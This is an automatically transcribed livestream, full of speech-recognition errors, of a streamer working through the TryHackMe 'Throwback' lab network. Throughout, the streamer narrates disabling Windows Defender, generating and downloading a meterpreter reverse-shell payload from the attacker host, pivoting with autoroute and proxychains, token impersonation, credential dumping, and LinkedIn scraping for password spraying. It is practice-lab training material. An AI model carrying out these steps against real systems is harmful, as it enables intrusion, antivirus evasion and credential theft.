ton zero set l port 424224 is what we chose Oh, that's still kicking So when I ran that earlier did it not send it? Yeah. Oh, okay. It still triggers antivirus Let's turn that off What was the stinking command that we ran earlier? set mp Uh shoot I'm trying to tap complete here, but PowerShell's getting meffed up. Yeah, shut set mp preference uh, real time set mp preference real time monitoring Oh, no, no, no, no, it was set mp preference and then disable real time monitoring to be true Those are arguments, right? Sorry frantic frantic alt tab on 18 set mp preference real time monitoring That's disable real time monitoring set to true I should really amp up this text here. I'm sorry. I hope you guys can see that. Okay I don't have permission Excuse me Run this as administrator, please Then let's invoke PowerShell and let's set Let's make this a little bit bigger. Sorry. So you can see this Wonderful powerful command apparently Now I want to cdc Users dir And we were in Mercer h earlier when we downloaded this thing, didn't we? We do we have to w get it again 10 50 22 5 8000 Not a shell.exe. I cannot see what I'm typing met.exe Okay Now it exists And I don't I don't know if the execution policy Would have affected the antivirus because windows defender is what was triggering on this binary I need a dot slash met dot exe Please Oh shoot. I needed to start that that listener set l port 4141 run There we go There we go Okay, awesome. Okay, so now we're on 118 We need a proxy one more time So if I background and I use auto route What do we've got? We can set our command to print to see what sessions that we have routes set on Right now it's set to six, which is the original throwback domain controller But now we're going to move it over to the corporate one So that should be set to session seven, but we have to go ahead and remove the one that we have So let's set the command to delete And That's fine Now we can run that to delete it So the command to print just for a sanity check currently no routes set. So let's set our session to Seven and set the command to auto add so that when I run this Now I have a new session for him Which means I can now proxy change evil winter m over to davies And his password needs to be Management 2018 got it sweet missed a lot. How did you get domain admin? Uh We found The backup account that Had dc sync writes and That was able to Dump all the credentials on the domain controller And we found the local administrator H That Had a decent password that we could crack Uh, nice. How did you get the memo about backup? I think there were some files back Uh, some time ago that that would that kind of turned us on to it. Yeah Yeah backup account and then magic we just kind of said hocus pocus and suddenly we rooted everything I don't I I'm kidding. I I'm teasing Identity theft is not a joke Oh, we're gonna do some impersonation stuff now. Okay Now that you have your foothold onto corp 80 t 01 your team has suggested escalating privileges by numerating privileges Looking for tokens on the system Similar to web cookies tokens are temporary keys. All right. We got to get metterpter on this guy now Whoo, we're having fun. We're having fun in the sun Um, let's turn off windows defender immediately Actually, am I in Am I local admin? net user What net user Who am I? Do I not have an account on here? What the what out of the stream die? What's up, everybody? Can you hear me? Okay. Are we back? Are we back in action? I don't even know what happened there Sweet sweet. I'm glad everyone's still with me. Thanks so much for hanging out. You guys are fantastic I looked over at obs and like the the streaming icon was not on anymore, but it was still recording I'm like, what just happened. Why did this? Why did this one of this die? So You didn't miss anything. You literally didn't I didn't do anything. I just saw your thing and I was like, uh The the stream is suddenly off not not good So now we're gonna count three streams This counts as an extra stream Whatever Do I have permission to turn off windows defender currently? I can run scripts, which is cool. Can I set an mp preference? To uh disable real-time monitoring To true I can okay fantastic. So with that, let's go ahead and download our Little not a shell shell. Uh, that is 10 Uh 50 22.5 on Port a thousand not a shell dot exe and we'll save it as met dot exe cool Now that's downloaded and I can see met dot exe is present So if I were to dot slash met dot exe Let me go back and actually make sure that I'm gonna listen So let me use multi handler Uh, I'll show options one last time to make sure everything is still set looks good Let's run that listener fire it off and there we go got one more meterpreter session on 243 So I can I don't know what session i'm in right now because two of them pop. So let me interact strictly with eight And excuse me sessions with an s plural incredible Now I could use the incognito module and see what tokens are available to me There is a room in this there. There is I think some post exploitation stuff that try hack me showcases for this sort of thing But this will be kind of cool a little exercise to play with it. So Let's load incognito And then let's try and list tokens It looks like I can specify By username. So I'll use list tokens tack you I'm not currently running a system so Do I need to be I don't think so. It says now that you have a foothold. You're good After getting meterpreter shall the target you could just load it and try to impersonate some tokens Do we have anything interesting? We could impersonate This individual All right, so if we have that impersonation token We could impersonate With that syntax that I just saw impersonate token And then I'll supply that Will it do it successfully impersonated user that user So am I like just that person now? I I am okay Incredible what is the file on the administrator's documents folder? No one told me that I needed to go into that Administrator documents server. Sissy. How's it going? My session on the dc died Okay, great, let's get to see Oh, yeah, would I just be able to like get system now with this user probably? Incredible Thanks Thanks, jaximus Let's cd to the that the other um Where am I right now? Excuse me I'm okay. I'm bumping around with throwback Seriously, where am I right now? Can I get to users? Yeah, okay That was weird Does this not have an administrator page? Whatever Um, what's on on the desktop right there root dot text Heck yeah Let me just take note of this one real quick We have so many so many sublime text windows open right now. Oh my lord so Oh, let me put that in the flag submission panel because we're so close What is the user flag? We don't have that yet, but we do have the root flag. So that's 20 Let's get 19 I'm just going to take that code real quick I know let's go find that We were in as davies j earlier. So I have a feeling davies j is where we're going to end up finding that user dir user dot text. All right. Awesome user dot text Whoa, whoa, try to copy paste All right okay Now I need to Actually see the file on the administrator's documents folder. Okay, so we know that the administrator was Dossier dossier, okay Great and they said the documents folder. So let me hop in there and I see an email update Let's check that out Nice I am going to steal this very very quickly Email update dot text on corp 80 t01 Cool Email underscore update dot text who wrote the email it was Karen dossier What is her official title and the company she is the human relations consultant And submit the flags Done and done. Okay. Let me actually read that email before I just steamroll right over it Hey team. Hope you guys are having a good day as all of you are probably aware Now we are transferring to our new email service as we transition Please get the new emails provided to you as well as the default credentials that can be found within your emails. Oh Please do not get these emails outside of the corporate as they contain sensitive information The new email format is based on what department you're in Okay In order to access your email, you need to go to the mail dot corporate local as we get our servers moved over If you not already have Mail on corporate at local site in your host file, please do that Feel free to email me with any questions. Oh, gotcha So this is the structure of their email with their name and the department We have a decent listing of some of the potential Departments there so Okay Hello Friends that are joining now. I appreciate you coming to hang out I realized we dumped into a uh, we jumped into an extra An extra stream because the other one kind of crashed on me for some reason so From the email on corp 80 t01 and we know that we have corporate emails being moved to a new email format Yeah, dude. Jackson is we can absolutely finish this today. How many we got left? Three Oh, let's do it It's only one. It's only one in the morning Oh, thank you. Yeah, I can never remember I can never remember where the host file is on On windows either using linkedin along elite linked we can pull Names and emails from linkedin to format with namely An insert into breach or gtfo Okay, oscent with linkedin overview linkedin since its creation has represented an incredibly valuable vector for information gathering After all, who would have imagined that people would just post their company structure job overview and work history publicly online If we just ask them kindly when I personally perform recon dark I typically visit linkedin through my second stage of oscent typically following initial automated phase Where I gather any emails that are publicly available once that is done We know the format of our target uses for email. We can journey on a linkedin and scrape names who expand our email list We'll dive into this further with elite linked uh Sorry Jackson, this is saying I didn't add the stuff to et cetera host and check them out So this is why it's not clear what you're currently doing Uh What session died? Oh the dc again, whatever What the mail server is two three two, isn't it that they specified that earlier? We saw The previous email So I guess I'm confused what extra what new email server there is There are two websites Oh It's a virtual host I follow Uh Thank you Okay What would you guys see that Georgia? Incredible pseudo nano et cetera the hosts so 242 Or 213 What was that? What was the original? 232 232 should be mail dot corporate dot local corporate Okay So Let's go to that with our socks proxy And we need to Ideally have credentials did We see credentials already You say there is another website. I'm very confused reach thingy. Oh Oh, oh, oh, oh, oh. Oh, you're right. You're right. You're right. I'm sorry I follow breach dot gtfo.local I follow Okay, I I guess I completely missed that that was A virtual host routing thing I should I should go to breach gtfo local Nice Okay Thank you Did I have credentials That I'm completely overlooking as well Maybe not I think that's why I need to uh Corporate emails are moving to an email format We also know that we have a propriety breached Credential service that we utilize to find credentials in the network Gotcha Lead linked as a tool developed by spooky and horschark Automate discovery of company employees linked in accounts by discovering all the employees an organization has This can be an incredibly useful for password spraying phishing or any other targeted attack Built in it has a feature to generate emails based off of a given format Which you can use to password spray fish or look up emails on the data breach The optional tag p flag if you like utilizes have I been pwn's api to query each email Enumerate which data breaches the victim has been a part of the output is stored within a spreadsheet That can be easily converted into a table and sorted and organized Okay Let's go Grab that tool if that's where all the cool kids are going whoa CD opt Get clone CD lead linked Hello That's a capital lead linked And let's install everything that this requires Pulling info from linked linked in with lead linked Lead linked is a linked in recon tool utilized by Finding employees at a company using search engines like google and bang If you have a have I been pwned api key You can also tell you what data breach is the user has been involved with with the separate section for specific password data breach That's cool It also does it with de hashed. Ooh Using the tool is easy. There are several required arguments arguments though e for the email domain For example gmail.com. So in our case, we're going to be using tbh security.com So if I were to just run python 3 lead linked Does it run? Okay. It does great. So e email domain tbh security.com Um, and what else did we need here? tack f which serves the email format email format Oh And there's an example of what those look like here So let me do a little tack h Generates emails based on various formats one equals j smith two equals john smith et cetera, et cetera, et cetera We know that the format is going to look like First initial last name. So that would be one Okay, so e tbh security f1 um We also need the company name So I guess throwback hacks Timeout for searching it has a default jitter has a default safe Only parts names with company title reduces false positives. I'm not worried about that right now tack p requires that api key. I think that's all we need Lastly a positional argument of the company name you're trying to search for is required. Okay, so we're doing that Probably just fine Let's Do it Lead linked Okay I guess that just happened then We'll not elicit this thing and see if that got anything Was it gonna output anything else or is it just got oh, okay. Okay. No, it just got a lot of stuff and Slick dude that was rapid fire fast Are you sure you didn't just cash that is that hard coded in If you give it these specific arguments it spits out this stuff Dang, yeah, I guess we're doing more excel Really Wow, okay Yeah, this is a lot This that's okay, though Looks like we've got a lot to work with I like the force blower case that makes me feel pretty leet Sweet Oh, there are only three employees on like then What happened? I mean realistically these are the only ones that we kind of like saw earlier, didn't we Should I should I remove those? Should I do those false positives? Let's use tack s Before I do that, let's copy that throwback one to Original dot xls and then let's run it with that tack s argument Oh Jazzmix is throwing the the linked in Uh company Here in the link I have a crap ton of Messages, sorry If you guys ever wanted to know how often people message me, it's uh A lot There's gotta be a LinkedIn flag Holy cow It's dark star Yo We're not dead yet Oh, that was hilarious Holy cow, I can't believe you guys are all still here You must really like this stuff, huh? Yeah firefox. I know you're having trouble getting my pages back Yeah, maybe we should have stopped that windows vm that was running in the background We still here We're still hanging out Let's uh, let's get back to try hack me, huh Oh, we probably need a sock server Oh god We gotta go back to do all that all over again How did I forget, huh? How did I forget? What do you think should we finish this thing? What uh, what all do we have left? Realistically, we probably have to get everything back again Uh Yeah, yeah, good. I'm glad everyone had some had some time to update their LinkedIn account Go ahead and send me a LinkedIn request if you want Um, um Let's connect to the vpn again So, uh, for those of you that might have been watching the video or uh, or are just now catching up My machine crashed Is really funny. It was me opening up the throwback security Uh It was me as it was looking at their LinkedIn company page And as soon as I open up dark stars page my machine dies So I could move my mouse and I could uh Move my mouse, but that was about it I saw um Like my face just like fade out to gray over on the obs screen I'm like, oh no So We've got Elite linked over here and we've got our throwback Script stuff Did we create a copy or did we move the other one because when I ran it with hack s for safe Uh, don't don't don't bother recovering stuff. Yeah. Okay. Cool. This only found three So these must be the only real ones that we found. Yeah, the video will definitely be uploaded to youtube It'll take me like forever to render all this, but that's totally fine. So We'll deal if you guys want to catch this video after the fact you can absolutely see it Uh on youtube All right next section is lost and found now that we have a list of emails from linkedin We can format them into a custom word list with the email format We got from corp adc zero one and put them into a breach credential service in case of throwbacks The internal breach credential server Slick So introduction to data breaches at the time of writing have I been pwned is a ginormous collection with a collection of over 10 billion Breach user accounts as well as 473 total breached websites This is an alarmingly high number but can offer a lot to an attacker looking to get an easy win Data breaches can confirm many things not just if the user has been hacked But it also confirms that an email account actually exists This is arguably more valuable than a password You can use this information in combination with phishing to gain some really easy wins within an organization For this next exercise, we have set up a breach credential lookup service called breach or gtfo A fake service within the network that is modeled after de-hashed a paid breach credential service so We can be using namely namely as a template based email wordless generation tool that can also be used for domain Do amin user wordless developed by orial It takes the nameless and a domain name or multiple domain names and generates a wordless around the two of them Namely can also take custom template keys in order to customize the wordless to your needs All right, let's go ahead and grab namely Uh, I don't need to sudo get clone. What the what? Why is that a sudo? That's weird to me Why is everything sudo? Insert the names that should be formatted by example. Okay Um We do have a breach Gtfo right. Yeah breach gtfo.local That's still a page we could use Um And we should put together a list of what we were looking at so throwback scraped has rica fox summer winters and john stewart This page suggests us to create a names dot text and they should be formatted Just like that. So okay, let me hop back to a proper directory in ctf try hack me throwback and suble tbh security names dot text and i'm going to Apparently no longer have in my clipboard the names that I wanted to have Totally fine. Yeah, I don't care about your recovery stuff. Let's just grab These slap them in rica summer john And I don't need these tabs here Okay, that's kind of it. It looks like super duper simple and That's all Okay Then they use namely with the names that we created domain of throwback security.com and using the template format that You can specify and they're all in hre We would need to Do that I feel like a couple more times because we aren't positive what Uh Department they might be in This is we could try it But to generate more complex user word list we can use tack tf to specify a template file Oh, no, and then they mentioned the etc host. Maybe this should be a little bit earlier. I don't know So in breacher gtfo you can enter the email address of the user Oh, and this is absolutely How can I read? How can I still access this? I'm control f-ing right now. I'm hard to control f5ing What the heck isn't that an internal thing that I'm supposed to be what Oh Oh You're right That's just an ip address. You're totally right. You're I'm sorry. I thought I was really freaked out I was like did I need to be pivoted like how is that working? No, that's just the regular dot two three two thing. I think that we saw earlier or Whichever two thirteen whatever whatever one that it was so You could specify emails. What is the user's email who has been affected by the data breach? What is the user's password? Well, we don't have a lot of options in this case So let's go ahead and make those names here and uh Work with it. Let's do it so In the directory where we have put our names We can run opt Namely Name name. Did I not get that thing? Where did I put this? Oh, I put namely in my leak leak link to the page. That's funny So now let's run opt namely That location with the tbh security names dot text the domain name is tbh security and It will generate those With hre, uh, there were other sections though so emails dot text Yeah, I feel like I want to change that to also include esm fin And all those other ones We could run it one more time if we really really wanted to But let's just take all this and Put it there with the different values Um, we need fin for finance and it s probably like it security And then sec maybe that's security Okay Done and done Now we have all those and I guess we could just try these on the web page I guess we could kind of do this manually if we really really wanted to it looks like that's kind of what they expected So we'll slap that in Nothing for him Yeah, honestly, you didn't exactly need a python script for for that thing As our winters, that's fine. How about j steward? Can we get dark star? No Do uh, we ever actually find a Do do do we find a breach at some point? Realistically, this is the thing we could probably have a python script for I'm just going to be like rapid fire Control c control v all tabbing around What what was that? Which one was that? Yeah, we could just probably use w first And that's a that's a pretty good point. It's literally a uh It's it's literally a htp get variable. So What the f? Okay, the very very last one that I got Totally fine We got it. So sec j steward is the one slap that guy in there Users password is that What credentials could be found? what J steward and that right what Uh What could be oh, oh, oh, oh, oh, I need to go into his email now Is that right? Yeah. Yeah. Yeah. I follow I follow mail dot corporate dot local And he is that Sec j steward there. Do I need the user? I mean, I guess yeah, it's just his username not the email address Do I need to be proxied for this thing to work or something? Because I'm not getting a response right now. I need the sec thingy What the hell's what do you mean the sec thingy? Oh, oh, oh, oh Sec j steward is his username. What you fools I understand. I got you But do I need do I need their full email address? Yeah I thought I wouldn't need that Please There we go We got bowjack horsemen in here Wow Wait, let me steal this email real quick. This has uh This is really devolved Like you could see me just slapping files into my my directory TV sec guest and welcome TV sec cool Submit recon flags here. Alrighty. There were some linkedin flags that I needed to get That I didn't earlier corporate mail server There's a flag on linkedin linkedin.com Was it company TBH security was there a hyphen in there? Yeah, maybe TBH hyphen security Yeah throwback hacks. Thanks. Thanks Thank you. I appreciate you chat Well, even that doesn't seem right Is it just a plus? That's it. Thanks The time of the machine Yeah, no worries. No worries. We're good. There is there Where might there be a flag in here? It's got to be on there folks There it is Can I send a friend request to all these people? Time for my computer to crash by simply opening linkedin apparently I'm sending you a request We're gonna be friends Just don't go to dark stars. Yeah, I I switched over to the tab and so far I'm okay Um flag on linkedin We got to close out some of these tabs, dude. We're this is going crazy Okay, let's get back to the original read me and ctf try hack me throwback I don't need this cool chrome anymore That was flag on linkedin, which is number 22 There we go What is the flag in the source code breached gtfo? Did I not see a flag there earlier? Or did I even look at that? Some weirds going on with the with the formatting there What is that? Is that because of this thing? Yeah Whatever Breach gtfo.local is there a tbh? Should it have been when I found the J steward account sec J steward at tbhsecurity.com Is that the one that has a Now that's now that's loading. What the network? Yeah network probably Decided to call it. Yeah. Yep. It didn't do it Good call The network said no more Well, this is good I don't feel so bad because I know I'm gonna have to re uh Yeah, now we now we can kick back I know I'm gonna have to reconnect to literally everything Oh, I'm really excited to get that certificate. It'll be kind of fun submit flags Was there another one that I needed over in part four? Yeah, honestly if we just Get the handler ready. That's a good call Use exploit. I don't even need to type exploit multi handler And then we will set lhost to be ton zero. We are connected to it. Yes, we are. Okay Set l port. It was four one four one set payload Windows meterpreter reverse shell tcp run Let's see if we'll get no callbacks What other flags that we need to supply? Oh, we need to the we need the source code Once breached gtfo comes back. It might be a little bit and work is running, right and work is running Can I ping production? I cannot ping production Does it still need time? probably Okay, good. I didn't want to make sure I had like any duplicate vpn connections or anything crazy wonky I want to be able to see that come through Machine just not on at the moment Now work up time two minutes. Yeah, I guess we can just kind of keep waiting Yeah, yeah, give it five minutes for sure Uh, I will use this opportunity to Take a quick break I really appreciate all you guys that are still sticking with me because we're so so close to the end right now And uh, it'll be kind of cool to wrap it all up Give me just a give me just a quick quick second. What should we do for our our be right back? What should what should we do we could do we could you see matrix? I feel like see matrix is a little bit too easy We could do a Low cat. Oh, we don't even have low cat installed Oh, dude. Thanks. Jackson is absolutely I think yeah, I think we're gonna be done with this pretty soon. So Thanks so much for hanging out. Thanks so much for all your help. This has been a lot of fun for me I hope I hope you were uh Comfortable chilling having out Thanks, narf. Yeah, I understood. I understood what you meant now I am weirded out that It still isn't Getting any responses Yeah, should I just bounce that open vpn? Yeah more came to help pretty soon I think so Especially if we're getting into the the fun of twitch I'm really grateful that you guys are all wanting to hang out And I like that we can kind of be cool and casual. Yeah I mean, I feel like it would just wouldn't respond We should still be able to see something. Wouldn't we not? What is the what's the firewall? What's that pf sends box he should respond right 138 try the breach website wtf Right, come on. Alrighty. I said I would take a break. Um Give me just a second To go take a break stand by Sorry As it's just as you come in. Hey, hi, I don't take a quick break. Sorry one sec. Yo Jump it back in. Let's uh Try to finish this up. Was it one one three eight It's a firewall Seriously, nothing is responding currently the network's been up for a while now But it's not currently seeing anything and this is weirding me out try the breach one more time. You think? Bro, shouldn't you be teaching? Why are you trying to go to https? Yeah Well, see now it's just trying to load you gave I gave him a task. Don't worry All right, http http is still not doing it. That was just cached Something's funky I didn't mean I don't mean for us to trip over this like last piece This is really upsetting. I'm really sorry like we we're so close to the end Why is going on should I like regenerate my vpn certificate? I feel like that's kind of all I got left right now It's running Multiple vpn sessions. I can I can do another pkill. I got no extra devices Yeah, man, I'm just I'm gonna regenerate that cert honestly or that that that certificate Cuz I'm weirded out that I'm not getting anything right now When I know that I should give me just a give me just a quick sec It thinks I'm connected Yeah, so it's going http. Oh, did it go back? What the heck? Let me just try and curl this thing Nothing It should be able to reach that so I'm worried if I have to regenerate my certificate It's gonna give me like a whole nother ip address though and then Then up my callbacks will work and I'll have to redo everything Should I restart the network because it says I'm connected. I'll just bounce it I guess Why did two people have to vote? It's my network I have to wait another hour Oh, really? I did not know that okay Try the firewall to see if it's up 10 224 138 Not that Still nothing It's it's way broke right now. I way broke it f I'm bummed Ask a mod On the discord. I don't know if any mods are gonna be awake right now Your pink said no route to house. Maybe net stat tech around to see your routes Should I I don't know if I want to bug? net stat attack rn Oh, I have two No, that's fine What's the what's the oh, oh, what's the ooh for? Are you freaking out about my discord? Are you freaking out about the routes? Am I am I stepping over something? No, no Yeah, it seems fine I can ping the gateway Super lame Smoke me's responding Cool name Yeah Firewall went rip 224 138 Nothing from the firewall smoke me's going Smoke me a mod Oh goodness, I appreciate appreciate the assist I see skitty online, but yeah, I don't want to bug him. He's He's king dude. He's got his crown Am I getting pings right now? I am the smoke me Excellent What are the odds if I regenerate my cert? My vpn connection. What are the odds that it completely kills? My ip address. I don't know if that'll do it Restart any kind of network services You add zero nine fours typing Oh I follow Can we join the same room and I'll vote to reset it? Yeah, whoever of you is in a throwback Please help Please help For those of you poor souls that are watching the video on youtube And I'm speaking this in the future or so and if you ever do see this Uh I'm truly sorry skip ahead I'm so close to the end Oh, yeah, can someone go back and add all the timestamps of this bad boy that'd be incredible Literally the last task Oh, I wow Thanks so much My name is in here Thank you That's kind of surreal. I'm really grateful My beta testing was connecting to the vpn and seeing if it worked and it worked then Oh shoot, we're gonna do rubius and star killer crap I gotta read. I gotta rebuild all that This picture makes me uncomfortable by the way. I know what he's doing Yeah, everything always works in development not in production Orpheus bumped a ping the skiddy Oh Yo Help help us reach the finish line That's so funny Yeah, remember how I told you to keep them on a separate terminal and have it open Yep, and then my computer crashed Wait non-skiddy Or if you're like, I ain't scared I feel so bad like I just am scrolling aimlessly and I have nothing to do This is really crippling. I'm not gonna lie Jump on cough while we're waiting Restart your pc so you can have your sixth stream Oh shoot Yeah, we could take a look at uh hanging out stream I appreciate you guys We're uh We're almost done with the second monster here How am I going to edit this video? Am I going to edit this video? Imagine if clients firewall crashing when you're doing a pentas Yeah Relabel stream to hangout stream Where we look at this picture of a dog Doing his thing It's an experience. I don't think you should edit. Well. Yeah, that's a fair point. Okay I can do nothing I can do Literally nothing Damn, this really sucks Resetting all network related stuff so service Restart Yeah, show me all my potential Possible network services that I could be running Oreo bite. Hey brother How's it going? I'm doing good However, I am uh Struggling to uh You're tired. Yeah, it's kind of late I don't know. I don't know what time it is over where you are, but it's like 2 30 in the morning right now so At least on my side I'm struggling to uh Do some fun stuff with my throwback network and it's Tough because we're like the very very last task Krillik and I don't have reset perms. Unfortunately. How could this happen to me? I like to we make this like a try hack me emergency everyone help john with his network You don't have to you have to sing the whole song. No, no, no Add a route to the linux routing table. So I took a look at my routes, right? So we got what is it net stat tack rn Uh my ton zero interface has got a route to like its own gateway To get into the rest of the network and that's a thing that exists I can I can I can jam with that right if I go to 224 which is my subnet and then that firewall 138 I get a good hole nothing Yeah, that's really the only line that it actually matters in that song If I were to do a good old curl Try to reach that boy. He's got he's also got nothing. I think my firewall It's kind of crapped out Jackson says look at discord bro. There's a lot of there's a lot of discord going on right I can toss over my connection pack for dot seven and start and extend the network a couple of hours But no guarantee I'll be awake Is the port open with nmap? What no I I I cannot reach it. I don't think It can't get there Vuvuvuvu admittedly Trace route What the hell is trace route on Linux? Is it trace rt or the full command trace route? Oh god No I mean I'll do it just for Just to make you all happy I'll run the trace route command After I install a thousand ruby packages for some reason tracer t Network all the things network all the things I'm kidding. I'm kidding Pseudo system ctl restart networking will absolutely kill the stream You will throw me my connection pack. Okay I'm grateful I suppose Thank you. I will download this and I will Use my poor man This is this for throwback. Is this for your throwback network though? Is it normally it has that throwback it has a the throwback suffix hyphen throwback What is your third oct? It's on dot five Oh boy Okay I probably didn't I probably didn't need to do that on that terminal I am now 10 50 dot 3 dot 2 Redo everything 200 dot 5 dot 138 There's a firewall. Okay Shit this is a little disorienting But you know what? Let's do it So I need to get All the way back So I need access on You have passwords so ssh. Yeah I have passwords for WS 01 Or prod. I could just get to prod. Hey john run this Yeah, yeah Did I do remina? So he was 10 205 219 That was peter's j With throwback 317 As his password Or is it throwback 319? Oh god I don't remember anything It's like it's all falling apart now Now I need to do a quick recap Throwback 317 Pretty sure that's it But it was peter's j No, that's not a command you should run So CMD We don't need Anything other than this proxy So Let's Hop over to my Miterpreter Section And start up an HTTP server Python.mhgp.server So my new IP address As I reconnect to Literally everything Is This guy So let's start MSF console In one pane I'll switch that to be the Regular prompt and I'll make this My MSF console Black, there we go And We need to get over to this guy And we need to run PowerShell Let's make this A little bit bigger so you guys can See it I realize this text is very very tiny And that's no good on your eyes So let's Make this 1050.3.2 8000 Naughtoshell.exe And bring that to Met.exe I need to recreate this whole Stinking thing Oh boy Yep Yep MSF Venom We need to create a new one MSF Venom Meturper Reverse TCP L host equals My ton zero L port So I don't forget at least that I am not Currently using Tmux For those that are asking Let's make that an executable And let's redirect it to new.exe Thanks It's going to take me a little bit And I feel really really bummed You guys had to deal with all that nonsense But you know what? We'll work with it So let's use multi-handler Let's set L host to ton zero Let's set this payload To Windows Reverse Reverse TCP Set L port 4141 And just let that bad boy go So now let's start this server Yet again Let's get back over here And Just to verify My execution policy I can do what I want, great And I'm using Terminator to split my screen Let's set MPP I'm probably not the admin But Let's make ourselves the admin So let's go ahead and run as user Or What is it? It was save cred And User Admin's Admin Peter's J To Profile CMD.exe What was his password again? He didn't We didn't have a Peter's J Peter's J There we go, okay Properties Now let's do some power shell And CD into C Windows Peter's J, get back to our normal spot Sorry, CDC users Peter's J Now let's set MP preference To turn off Real-time auditing just in case it is Disable Real-time monitoring Set that to true And now let's W get HTTP CD3 to 8000 New.exe to Omet.exe It should download it, we do have Met.exe Let's run that .slash Met.exe, before I do I want to make sure That that shell is running and it is Great, so now I can .slash Met.exe And I should get metropic recession running Fantastic Okay, now let's go to the background And use auto route Okay Let's set Session 1 And set subnet to 10 200.50 Slash 24 And then run that Let's also search for that socks for a Sorry You're probably giving me things To Do And I'm just like blaring along I don't mean to be Not following through Now let's get on the domain controller So XfreeRDP To User MercerH Password throwback 2020 And v10 205.117 Sorry, it's tag U Yep, I totally trust that Uh Was I wrong In that regard Gosh, I feel like I'm trying to remember everything Oh yeah, I did get his password. I'm sorry I totally had that Pika Pika, thank you Goodness I am falling apart Pikachu Seven There we go I don't know if I really want to open that one I'll be honest It doesn't matter, but the GUI might just Make me trip on stupid things So I don't want to I have no idea why you guys are sticking with me We're just retracing our steps Frustrated John Well, I definitely have this command And grain into my head now So that's a plus I now know how to turn off Real-time monitoring all the time On a Windows 10 machine So Where's met.exe Oh shoot Shoot You're totally right, I'm sorry I just saw your chat that I got that wrong As Windows Defender was like Nope, no more interpreter Thank you I literally say that as I was Saying Oh yeah, I totally know how to run this command And clearly I fudge that up too Where's met I just downloaded you Okay Great background Now let's Use auto route Once again Before I go through all this, I'm sorry I should be checking out that Breach GTFO local And this should Oh, I need to update my et cetera Hosts now So much to change And my DC connection Died What the heck So this is now 5 and 5 Breach GTFO.local Should that Still come back I feel like that should come back At this point, HTTP Why are you redirecting me Stop redirecting me We're going to stinking chrome On this GTFO.local There we go Okay, Stuart At Tbhsecurity.com Give me that Please have a flag here There we go Oh my gosh Go all the way back And submit that Okay, okay, okay, okay We're almost done, we're on our Not our second wind, but like our seventh wind Right now So let's keep cruising And the interpreter had died On Our DC So let's get that back What's happening Is that why we migrated Like immediately It's still killing my Met.exe So I probably need to run that F Use multi handler Run Go, go, go Okay, migrate, tag in Windlogon.exe It's a race Windows Defender can't stop us now We did it We're safe for now Now let us Background and use auto route Once again Auto route Dude, auto route? Yeah, I'd buy that Show options Set cmd to delete Run Set cmd to auto add And set cmd Sorry, set session To three Which is the current one Excuse me, why did that not work Windows Defender kills Windlogon.exe I'm sorry That made me laugh harder than it should have That's awesome Print Run Session one, why are you still doing that thing Set cmd to delete Set session one Delete Oh god, the stupid Set subnet Crap again 10, 200, 5, 0 Now do it Set cmd print And now it's gone Set cmd to auto add And then Set session to three Which should still be alive Great Now Let's do yet another free rdp There's a lot of stuff going on dudes Proxychains Which we can still go through X Free rdp Tag U, Mercer H Tag P, Pika Pika Pickachu7 10, 200 5, 118 To get me to Corp Now we got new creds Oh yeah, we can just go straight to that We don't need to bother Well corp80t Is that Or this is for the mail server Is it not? What's this mail? Maybe I'm confused You may not have access to your area Could count while getting a few days In the meantime you're able to use the guest account You can access the account with the following credentials This guest account will be heavily monitored And it'll be activated as soon as your account is up and running Which, what is that new server that I'm just missing? Is that on Our domain that I'm just not Parsing? It's on the map It's on the map Door of the explorer It's on the map Tbsecdc101 and we know that is dot 79 Okay So we still needed to pivot And to get into corp dc01 So I think I still need My proxy chains Through dc01 I don't think I'm crazy in setting that up Am I? Oh god X free rdp This guy I feel like I still need to get a shell on this Or a proper proxy Through this This is like a race To reach the end I'm 50 50.3.2 For 8000 New.exe I need to actually Put that somewhere Let me cd2cusers Mercer j Mercer h, sorry And now run that wget command And Make an interpreter Good Okay, use multi handler Run dot slash met.exe Hello I was a typo, please don't die Thank you met.exe New session Let's migrate ASAP again Just in case this thing dies, winlogon.exe Winlogon is always 708 man Great Now he is safe momentarily Let's use auto route yet again Set cmd To delete Did it screw up my subnet? No it didn't Okay So Run Set cmd to print Run, no routes Set cmd, what sessions do I have? Session 4 is the current one all the way through corp So Set session to 4 Set cmd to auto add And go Okay, incredible Now I should be able to go reach dot 7 9 I have credentials On a guest account Correct And Is that going to be a web mail server? It said here You can use the guest account Let me do a quick end map scan on that Really cool Because I don't exactly know what that box is End map Tag v 10, 205, 79 And Is that something that I can literally RDP into though? Proxychains XfreeRDP I'll just do it again, I'll just try it TB guest And welcome TBsec Should be 10, 200 dot 5 Now 79 And ask for a certificate Will it work? Yeah, alright Okay We're doing it again All over again We got This little flag here for user Just slap that in For user On That's number 25 Right What happened to 4? A 24 I just didn't write down It's a little bit bigger so you can see it, sorry And now we need to get root on that thing So We should Get Rubius And Starkiller all set up Again Let me see if I can remind myself How to actually Do that I want to get A regular shell on this I don't think I can though Because I probably won't be able to disable Defender Because I don't have privilege escalation yet So I think I've just got to go for Getting Rubius back on Starkiller back on there But I need to get an agent on there After retrieving credentials from the mail server We gain access to dbsec's domain controller Oh no, yeah, I didn't even try So I guess I can try It's worth The try I might Oh no, this is a guest account So that might be really weird It's a thing Let's get back to my server Use Multihandler Run ASAP In case it kills Met AV Did I say run? Did I run that? Great We could do some other privest stuff Maybe if we wanted to Let me migrate on that ASAP Just in case Can I just get system? Quick win? Nah Fine Let's do the empire at this point To use Rubius to automate Kerberoasting We can either compile and transfer a bind around the target machine However, this will get picked up by AV Or you can use a C2 C2 tool To load Rubius and execute commands in the C2 agent So We'll need to generate a stager and star killer To transfer the domain controller and get a star killer agent On the domain controller Alright Time to remember All of the empire star killer things That I was doing There are a lot of shells All of which are seemingly being used Currently for I should No longer use this shell If I'm depending on him to do all of these other XRDP things This will now be my Dead shell Let's Go into opt And empire And I think we needed to Pseudo empire rest Is that right? Yeah We need to Get into Star killer Pseudo star killer No sandbox This kind of feels good Honestly, this feels like I have learned something And I feel like I'm working through here So I need to create a new stager Right, so I can do that Um You know metasploit does have Kerberos Does it? So you're gonna end up teaching me A thing or two here Search Kerberos Oh Can I use that? Or Load meme cats? Oh that's true I was too stuck in my ways Load Meme cats I could like load Kiwi now But will it be able to like Get stuff? I'm confused Jackson is I'm gonna wait For you to throw something at me And I'm gonna Keep cruising on Star killer If that's totally cool While you while you while you enlighten me Because this is gonna be that's gonna be new For my mind I'm just trying to get a star killer because I hate it Well, let's create a new stager Let's Do some HTA stuff Do we think? Is that how that should work? I need a listener I need to be myself 10.50.3.2 Do I need a port or something to like listen on? 999 No Oh I need a listener I now understand HTTP Quad 